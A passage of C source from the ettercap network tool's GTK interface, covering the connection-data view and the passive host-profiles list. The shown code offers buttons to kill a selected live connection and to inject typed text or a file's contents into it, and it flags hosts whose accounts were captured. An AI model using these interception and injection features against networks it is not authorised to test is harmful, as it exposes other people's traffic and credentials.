data"); gtk_window_set_default_size(GTK_WINDOW (data_window), 600, 400); gtk_container_set_border_width(GTK_CONTAINER (data_window), 5); g_signal_connect(G_OBJECT(data_window), "delete_event", G_CALLBACK(gtkui_destroy_conndata), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(data_window, gtkui_connection_data_attach); gtk_container_add(GTK_CONTAINER(data_window), child); gtk_window_present(GTK_WINDOW (data_window)); } /* attach connection data tab */ static void gtkui_connection_data_attach(void) { if (curr_conn) { conntrack_hook_conn_del(curr_conn, split_print_po); conntrack_hook_conn_del(curr_conn, join_print_po); } gtk_widget_destroy(data_window); textview1 = NULL; textview2 = NULL; textview3 = NULL; data_window = NULL; gtkui_connection_data_split(); } /* close connection data tab */ static void gtkui_destroy_conndata(void) { DEBUG_MSG("gtkui_destroy_conndata"); if (curr_conn) { conntrack_hook_conn_del(curr_conn, split_print_po); conntrack_hook_conn_del(curr_conn, join_print_po); curr_conn->flags &= ~CONN_VIEWING; curr_conn = NULL; } gtk_widget_destroy(data_window); textview1 = NULL; textview2 = NULL; textview3 = NULL; data_window = NULL; } /* print connection data to one of the split or joined views */ /* int buffer - 1 for left split view, 2 for right split view, 3 for joined view */ /* char *data - string to print */ /* int color - 2 for blue text (used in joined view) */ static void gtkui_data_print(int buffer, char *data, int color) { GtkTextIter iter; GtkTextBuffer *textbuf = NULL; GtkWidget *textview = NULL; GtkTextMark *endmark = NULL; char *unicode = NULL; switch(buffer) { case 1: textbuf = splitbuf1; textview = textview1; endmark = endmark1; break; case 2: textbuf = splitbuf2; textview = textview2; endmark = endmark2; break; case 3: textbuf = joinedbuf; textview = textview3; endmark = endmark3; break; default: return; } /* make sure data is valid UTF8 */ unicode = gtkui_utf8_validate(data); /* if interface has been destroyed or unicode conversion failed */ if(!data_window || !textbuf || !textview || !endmark || !unicode) return; gtk_text_buffer_get_end_iter(textbuf, &iter); if(color == 2) gtk_text_buffer_insert_with_tags_by_name(textbuf, &iter, unicode, -1, "blue_fg", "monospace", NULL); else gtk_text_buffer_insert_with_tags_by_name(textbuf, &iter, unicode, -1, "monospace", NULL); gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview), endmark, 0, FALSE, 0, 0); } static void split_print(u_char *text, size_t len, struct ip_addr *L3_src) { int ret; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, text, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(text, len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(L3_src, &curr_conn->L3_addr1)) gtkui_data_print(1, dispbuf, 0); else gtkui_data_print(2, dispbuf, 0); } static void split_print_po(struct packet_object *po) { int ret; /* if not open don't refresh it */ if (!data_window) return; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, po->DATA.disp_data, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(po->DATA.disp_len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(po->DATA.disp_data, po->DATA.disp_len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(&po->L3.src, &curr_conn->L3_addr1)) gtkui_data_print(1, dispbuf, 0); else gtkui_data_print(2, dispbuf, 0); } /* * show the data in a joined window */ static void gtkui_connection_data_join(void) { GtkWidget *hbox, *vbox, *label, *scrolled, *button, *child; GtkTextIter iter; #define TITLE_LEN (MAX_ASCII_ADDR_LEN * 2) + 6 char src[MAX_ASCII_ADDR_LEN]; char dst[MAX_ASCII_ADDR_LEN]; char title[TITLE_LEN]; static gint scroll_join = 2; DEBUG_MSG("gtk_connection_data_join"); /* if we're switching views, make sure old hook is gone */ conntrack_hook_conn_del(curr_conn, split_print_po); if(data_window) { child = gtk_bin_get_child(GTK_BIN (data_window)); gtk_container_remove(GTK_CONTAINER (data_window), child); textview1 = NULL; textview2 = NULL; splitbuf1 = NULL; splitbuf2 = NULL; endmark1 = NULL; endmark2 = NULL; } else { data_window = gtkui_page_new("Connection data", >kui_destroy_conndata, >kui_connection_data_detach); } /* don't timeout this connection */ curr_conn->flags |= CONN_VIEWING; vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER(data_window), vbox); gtk_widget_show(vbox); /* title */ snprintf(title, TITLE_LEN, "%s:%d - %s:%d", ip_addr_ntoa(&curr_conn->L3_addr1, src), ntohs(curr_conn->L4_addr1), ip_addr_ntoa(&curr_conn->L3_addr2, dst), ntohs(curr_conn->L4_addr2)); label = gtk_label_new(title); gtk_misc_set_alignment(GTK_MISC(label), 0, 0.5); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); gtk_widget_show(label); /* data */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); textview3 = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview3), GTK_WRAP_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview3), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview3), FALSE); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview3), 5); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview3), 5); gtk_container_add(GTK_CONTAINER (scrolled), textview3); gtk_widget_show(textview3); joinedbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview3)); gtk_text_buffer_create_tag (joinedbuf, "blue_fg", "foreground", "blue", NULL); gtk_text_buffer_create_tag (joinedbuf, "monospace", "family", "monospace", NULL); gtk_text_buffer_get_end_iter(joinedbuf, &iter); endmark3 = gtk_text_buffer_create_mark(joinedbuf, "end", &iter, FALSE); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); gtk_widget_show(hbox); button = gtk_button_new_with_mnemonic("_Split View"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_data_split), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("_Kill Connection"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_kill_curr_conn), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); gtk_widget_show(data_window); if(GTK_IS_WINDOW (data_window)) gtk_window_present(GTK_WINDOW (data_window)); else gtkui_page_present(data_window); /* after widgets are drawn, scroll to bottom */ g_timeout_add(500, gtkui_connections_scroll, &scroll_join); /* print the old data */ connbuf_print(&curr_conn->data, join_print); /* add the hook on the connection to receive data only from it */ conntrack_hook_conn_add(curr_conn, join_print_po); } static gboolean gtkui_connections_scroll(gpointer data) { gint *type = data; if (type == NULL) return FALSE; if(*type == 1 && textview1 && endmark1 && textview2 && endmark2) { /* scroll split data views to bottom */ gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview1), endmark1, 0, FALSE, 0, 0); gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview2), endmark2, 0, FALSE, 0, 0); } else if(textview3 && endmark3) { /* scroll joined data view to bottom */ gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview3), endmark3, 0, FALSE, 0, 0); } /* only execute once, don't repeat */ return(FALSE); } static void join_print(u_char *text, size_t len, struct ip_addr *L3_src) { int ret; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, text, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(text, len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(L3_src, &curr_conn->L3_addr1)) gtkui_data_print(3, dispbuf, 1); else gtkui_data_print(3, dispbuf, 2); } static void join_print_po(struct packet_object *po) { int ret; /* if not focused don't refresh it */ if (!data_window) return; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, po->DATA.disp_data, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(po->DATA.disp_len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(po->DATA.disp_data, po->DATA.disp_len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(&po->L3.src, &curr_conn->L3_addr1)) gtkui_data_print(3, dispbuf, 1); else gtkui_data_print(3, dispbuf, 2); } /* * erase the connection list */ static void gtkui_connection_purge(void *conn) { struct row_pairs *row, *nextrow, *list = connections; /* variable not used */ (void) conn; DEBUG_MSG("gtkui_connection_purge"); connections = NULL; for(row = list; row; row = nextrow) { nextrow = row->next; SAFE_FREE(row); } conntrack_purge(); gtk_list_store_clear(GTK_LIST_STORE (ls_conns)); } /* * kill the selected connection connection */ static void gtkui_connection_kill(void *conn) { GtkTreeIter iter; GtkTreeModel *model; struct conn_tail *c = NULL; /* variable not used */ (void) conn; DEBUG_MSG("gtkui_connection_kill"); model = GTK_TREE_MODEL (ls_conns); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 11, &c, -1); } else return; /* nothing is selected */ if (!c || !c->co) return; /* kill it */ switch (user_kill(c->co)) { case E_SUCCESS: /* set the status */ c->co->status = CONN_KILLED; gtkui_message("The connection was killed !!"); break; case -E_FATAL: gtkui_message("Cannot kill UDP connections !!"); break; } } /* * call the specialized funtion as this is a callback * without the parameter */ static void gtkui_connection_kill_curr_conn(void) { DEBUG_MSG("gtkui_connection_kill_curr_conn"); /* kill it */ switch (user_kill(curr_conn)) { case E_SUCCESS: /* set the status */ curr_conn->status = CONN_KILLED; gtkui_message("The connection was killed !!"); break; case -E_FATAL: gtkui_message("Cannot kill UDP connections !!"); break; } } /* * inject interactively with the user */ static void gtkui_connection_inject(void) { GtkWidget *dialog, *text, *label, *vbox, *frame, *content_area; GtkWidget *button1, *button2, *hbox; GtkTextBuffer *buf; GtkTextIter start, end; char tmp[MAX_ASCII_ADDR_LEN]; gint response = 0; DEBUG_MSG("gtk_connection_inject"); if(curr_conn == NULL) return; dialog = gtk_dialog_new_with_buttons("Character Injection", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_box_pack_start(GTK_BOX(content_area), vbox, FALSE, FALSE, 0); label = gtk_label_new ("Packet destination:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button1 = gtk_radio_button_new_with_label(NULL, ip_addr_ntoa(&curr_conn->L3_addr2, tmp)); gtk_box_pack_start(GTK_BOX(hbox), button1, FALSE, FALSE, 0); button2 = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (button1), ip_addr_ntoa(&curr_conn->L3_addr1, tmp)); gtk_box_pack_start(GTK_BOX(hbox), button2, FALSE, FALSE, 0); label = gtk_label_new ("Characters to be injected:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0); frame = gtk_frame_new(NULL); gtk_frame_set_shadow_type(GTK_FRAME (frame), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX (vbox), frame, TRUE, TRUE, 5); text = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (text), GTK_WRAP_CHAR); gtk_container_add(GTK_CONTAINER (frame), text); gtk_widget_show_all(dialog); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); SAFE_REALLOC(injectbuf, 501 * sizeof(char)); memset(injectbuf, 0, 501); buf = gtk_text_view_get_buffer(GTK_TEXT_VIEW (text)); /* initialize iters for get text */ gtk_text_buffer_get_start_iter(buf, &start); gtk_text_buffer_get_start_iter(buf, &end); /* advance end iter to end of text, 500 char max */ gtk_text_iter_forward_chars(&end, 500); strncpy(injectbuf, gtk_text_buffer_get_text(buf, &start, &end, FALSE), 501); if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) gtkui_inject_user(1); else if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) gtkui_inject_user(2); } gtk_widget_destroy(dialog); } static void gtkui_inject_user(int side) { size_t len; /* escape the sequnces in the buffer */ len = strescape(injectbuf, injectbuf, strlen(injectbuf)+1); /* check where to inject */ if (side == 1 || side == 2) { user_inject(injectbuf, len, curr_conn, side); } } /* * inject form a file */ static void gtkui_connection_inject_file(void) { /* START */ GtkWidget *dialog, *label, *vbox, *hbox, *content_area; GtkWidget *button1, *button2, *button, *entry; char tmp[MAX_ASCII_ADDR_LEN]; const char *filename = NULL; gint response = 0; DEBUG_MSG("gtk_connection_inject_file"); if(curr_conn == NULL) return; dialog = gtk_dialog_new_with_buttons("Character Injection", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); gtk_window_set_default_size(GTK_WINDOW (dialog), 400, 150); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_box_pack_start(GTK_BOX(content_area), vbox, FALSE, FALSE, 0); label = gtk_label_new ("Packet destination:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); gtk_box_pack_start (GTK_BOX (vbox), hbox, FALSE, FALSE, 0); button1 = gtk_radio_button_new_with_label(NULL, ip_addr_ntoa(&curr_conn->L3_addr2, tmp)); gtk_box_pack_start(GTK_BOX(hbox), button1, FALSE, FALSE, 0); gtk_widget_show(button1); button2 = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (button1), ip_addr_ntoa(&curr_conn->L3_addr1, tmp)); gtk_box_pack_start(GTK_BOX(hbox), button2, FALSE, FALSE, 0); label = gtk_label_new ("File to inject:"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); gtk_box_pack_start (GTK_BOX (vbox), hbox, FALSE, FALSE, 0); entry = gtk_entry_new(); gtk_box_pack_start(GTK_BOX (hbox), entry, TRUE, TRUE, 0); button = gtk_button_new_with_label("..."); gtk_box_pack_start(GTK_BOX (hbox), button, FALSE, FALSE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_filename_browse), entry); gtk_widget_show_all(dialog); response = gtk_dialog_run(GTK_DIALOG (dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_entry_get_text(GTK_ENTRY (entry)); if(filename && strlen(filename) > 0) { if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) gtkui_inject_file(filename, 1); else if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) gtkui_inject_file(filename, 2); } } gtk_widget_destroy(dialog); } /* * map the file into memory and pass the buffer to the inject function */ static void gtkui_inject_file(const char *filename, int side) { int fd; void *buf; size_t size, ret; DEBUG_MSG("inject_file %s", filename); /* open the file */ if ((fd = open(filename, O_RDONLY | O_BINARY)) == -1) { ui_error("Can't load the file"); return; } /* calculate the size of the file */ size = lseek(fd, 0, SEEK_END); /* load the file in memory */ SAFE_CALLOC(buf, size, sizeof(char)); /* rewind the pointer */ lseek(fd, 0, SEEK_SET); ret = read(fd, buf, size); close(fd); if (ret != size) { ui_error("Cannot read the file into memory"); return; } /* check where to inject */ if (side == 1 || side == 2) { user_inject(buf, size, curr_conn, side); } SAFE_FREE(buf); } static void set_connfilter(GtkWidget *widget, gpointer *data) { gboolean *value; DEBUG_MSG("set_connfilter"); value = (gboolean*)data; *value = gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON(widget)); /* reapply the filter */ gtk_tree_model_filter_refilter(GTK_TREE_MODEL_FILTER(filter.model)); } static void set_connfilter_host(GtkWidget *widget, gpointer *data) { /* unused variable */ (void) data; DEBUG_MSG("set_connfilter_host"); filter.host = gtk_entry_get_text(GTK_ENTRY(widget)); /* reapply the filter */ gtk_tree_model_filter_refilter(GTK_TREE_MODEL_FILTER(filter.model)); } static gboolean connfilter(GtkTreeModel *model, GtkTreeIter *iter, gpointer *data) { gchar *src_host, *dst_host; gboolean ret = TRUE; struct conn_tail *conn = NULL; /* unused variable */ (void) data; /* fetch row values */ gtk_tree_model_get(model, iter, 1, &src_host, 4, &dst_host, 11, &conn, -1); /* evaluate filter criteria */ /* host filter set - filter hosts that do not match */ if (filter.host && strlen(filter.host)) { if (src_host && !strcasestr(src_host, filter.host) && dst_host && !strcasestr(dst_host, filter.host)) { ret = FALSE; g_free(src_host); g_free(dst_host); } } if (conn && conn->co) { /* protocol filter */ switch (conn->co->L4_proto) { case NL_TYPE_UDP: if (!filter.udp) ret = FALSE; break; case NL_TYPE_TCP: if (!filter.tcp) ret = FALSE; break; default: if (!filter.other) ret = FALSE; } /* connection state filter */ switch (conn->co->status) { case CONN_IDLE: if (!filter.idle) ret = FALSE; break; case CONN_ACTIVE: if (!filter.active) ret = FALSE; break; case CONN_CLOSING: if (!filter.closing) ret = FALSE; break; case CONN_CLOSED: if (!filter.closed) ret = FALSE; break; case CONN_KILLED: if (!filter.killed) ret = FALSE; break; default: break; } } else { ret = FALSE; } return ret; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_view_profiles.c000664 000000 000000 00000056260 13711276346 023527 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include /* proto */ static void gtkui_profiles_detach(GtkWidget *child); static void gtkui_profiles_attach(void); static void gtkui_kill_profiles(void); static gboolean refresh_profiles(gpointer data); static void gtkui_profile_detail(void); static void gtkui_profile_detail_destroy(GtkWidget *widget, gpointer *data); static void gtkui_profiles_local(void); static void gtkui_profiles_remote(void); static void gtkui_profiles_convert(void); static void gtkui_profiles_dump(void *dummy); static void dump_profiles(void); static struct host_profile *gtkui_profile_selected(void); /* globals */ static char *logfile = NULL; static GtkWidget *profiles_window = NULL; static GtkWidget *treeview = NULL; static GtkTreeSelection *selection = NULL; static GtkListStore *ls_profiles = NULL; static guint profiles_idle; /* for removing the idle call */ static guint detail_timer = 0; /*******************************************/ /* * the auto-refreshing list of profiles */ void gtkui_show_profiles(void) { GtkWidget *scrolled, *vbox, *hbox, *button; GtkCellRenderer *renderer; GtkTreeViewColumn *column; DEBUG_MSG("gtk_show_profiles"); /* if the object already exist, set the focus to it */ if(profiles_window) { if(GTK_IS_WINDOW (profiles_window)) gtk_window_present(GTK_WINDOW (profiles_window)); else gtkui_page_present(profiles_window); return; } profiles_window = gtkui_page_new("Profiles", >kui_kill_profiles, >kui_profiles_detach); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER (profiles_window), vbox); gtk_widget_show(vbox); /* list */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_SINGLE); g_signal_connect (G_OBJECT (treeview), "row_activated", G_CALLBACK (gtkui_profile_detail), NULL); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes (" ", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("IP Address", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id (column, 1); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Hostname", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id (column, 2); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); #ifdef HAVE_GEOIP renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Country", renderer, "text", 3, NULL); gtk_tree_view_column_set_sort_column_id (column, 3); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); #endif refresh_profiles(NULL); gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (ls_profiles)); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button = gtk_button_new_with_mnemonic("Purge _Local"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_profiles_local), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("Purge _Remote"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_profiles_remote), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show_all(hbox); button = gtk_button_new_with_mnemonic("_Convert to Host List"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_profiles_convert), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("_Dump to File"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_profiles_dump), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show_all(hbox); /* refresh the stats window every 1000 ms */ /* GTK has a gtk_idle_add also but it calls too much and uses 100% cpu */ profiles_idle = g_timeout_add(1000, refresh_profiles, NULL); gtk_widget_show(profiles_window); } static void gtkui_profiles_detach(GtkWidget *child) { profiles_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (profiles_window), "Collected passive profiles"); gtk_window_set_default_size(GTK_WINDOW (profiles_window), 400, 300); g_signal_connect (G_OBJECT (profiles_window), "delete_event", G_CALLBACK (gtkui_kill_profiles), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(profiles_window, gtkui_profiles_attach); gtk_container_add(GTK_CONTAINER (profiles_window), child); gtk_window_present(GTK_WINDOW (profiles_window)); } static void gtkui_profiles_attach(void) { gtkui_kill_profiles(); gtkui_show_profiles(); } static void gtkui_kill_profiles(void) { DEBUG_MSG("gtk_kill_profiles"); g_source_remove(profiles_idle); gtk_widget_destroy(profiles_window); profiles_window = NULL; } static gboolean refresh_profiles(gpointer data) { GtkTreeIter iter; GtkTreeModel *model; gboolean gotiter = FALSE; struct host_profile *hcurr, *hitem; struct open_port *o; struct active_user *u; char tmp[MAX_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; int found = 0; /* variable not used */ (void) data; if(!ls_profiles) { ls_profiles = gtk_list_store_new (5, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_POINTER); } /* get iter for first item in list widget */ model = GTK_TREE_MODEL(ls_profiles); gotiter = gtk_tree_model_get_iter_first(model, &iter); TAILQ_FOREACH(hcurr, &EC_GBL_PROFILES, next) { /* see if the item is already in our list */ gotiter = gtk_tree_model_get_iter_first(model, &iter); while(gotiter) { gtk_tree_model_get (model, &iter, 4, &hitem, -1); if(hcurr == hitem) { found = 0; /* search at least one account */ LIST_FOREACH(o, &(hcurr->open_ports_head), next) { LIST_FOREACH(u, &(o->users_list_head), next) { found = 1; } } gtk_list_store_set (ls_profiles, &iter, 0, (found)?"X":" ", -1); /* check if we have to update the hostname */ if (strcmp(hcurr->hostname,"")) { gtk_list_store_set(ls_profiles, &iter, 2, hcurr->hostname, -1); } else { /* resolve the hostname (using the cache) */ if (host_iptoa(&hcurr->L3_addr, name) == -E_NOMATCH) { gtk_list_store_set(ls_profiles, &iter, 2, "resolving...", -1); struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LIST_STORE; ro->liststore = GTK_LIST_STORE(ls_profiles); ro->treeiter = iter; ro->column = 2; ro->ip = &hcurr->L3_addr; g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { strncpy(hcurr->hostname, name, MAX_HOSTNAME_LEN); gtk_list_store_set(ls_profiles, &iter, 2, hcurr->hostname, -1); } } break; } gotiter = gtk_tree_model_iter_next(model, &iter); } /* if it is, move on to next item */ if(gotiter) continue; found = 0; /* search at least one account */ LIST_FOREACH(o, &(hcurr->open_ports_head), next) { LIST_FOREACH(u, &(o->users_list_head), next) { found = 1; } } /* otherwise, add the new item */ gtk_list_store_append (ls_profiles, &iter); gtk_list_store_set (ls_profiles, &iter, 0, (found)?"X":" ", 1, ip_addr_ntoa(&hcurr->L3_addr, tmp), 4, hcurr, -1); #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) gtk_list_store_set(ls_profiles, &iter, 3, geoip_country_by_ip(&hcurr->L3_addr), -1); #endif /* treat hostname resolution differently due to async processing */ if (strcmp(hcurr->hostname,"")) { gtk_list_store_set(ls_profiles, &iter, 2, hcurr->hostname, -1); } else { /* resolve the hostname (using the cache) */ if (host_iptoa(&hcurr->L3_addr, name) == -E_NOMATCH) { gtk_list_store_set(ls_profiles, &iter, 2, "resolving...", -1); struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LIST_STORE; ro->liststore = GTK_LIST_STORE(ls_profiles); ro->treeiter = iter; ro->column = 2; ro->ip = &hcurr->L3_addr; g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { strncpy(hcurr->hostname, name, MAX_HOSTNAME_LEN); gtk_list_store_set(ls_profiles, &iter, 2, hcurr->hostname, -1); } } } return TRUE; } /* * display details for a profile */ static void gtkui_profile_detail(void) { GtkWidget *dwindow, *vbox, *hbox, *table, *label, *button; struct host_profile *h; struct open_port *o; struct active_user *u; char tmp[MAX_ASCII_ADDR_LEN]; char os[OS_LEN+1]; gchar *str, *markup; guint nrows = 2, ncols = 3, col = 0, row = 0; DEBUG_MSG("gtkui_profile_detail"); h = gtkui_profile_selected(); memset(os, 0, sizeof(os)); dwindow = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW(dwindow), "Profile Details"); gtk_window_set_modal(GTK_WINDOW(dwindow), TRUE); gtk_window_set_transient_for(GTK_WINDOW(dwindow), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(dwindow), GTK_WIN_POS_CENTER_ON_PARENT); gtk_container_set_border_width(GTK_CONTAINER(dwindow), 5); g_signal_connect(G_OBJECT(dwindow), "delete-event", G_CALLBACK(gtkui_profile_detail_destroy), NULL); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 5, FALSE); gtk_container_add(GTK_CONTAINER(dwindow), vbox); table = gtk_table_new(nrows, ncols, FALSE); gtk_table_set_row_spacings(GTK_TABLE(table), 5); gtk_table_set_col_spacings(GTK_TABLE(table), 5); gtk_container_set_border_width(GTK_CONTAINER(table), 8); gtk_box_pack_start(GTK_BOX(vbox), table, FALSE, FALSE, 0); /* Host Information */ label 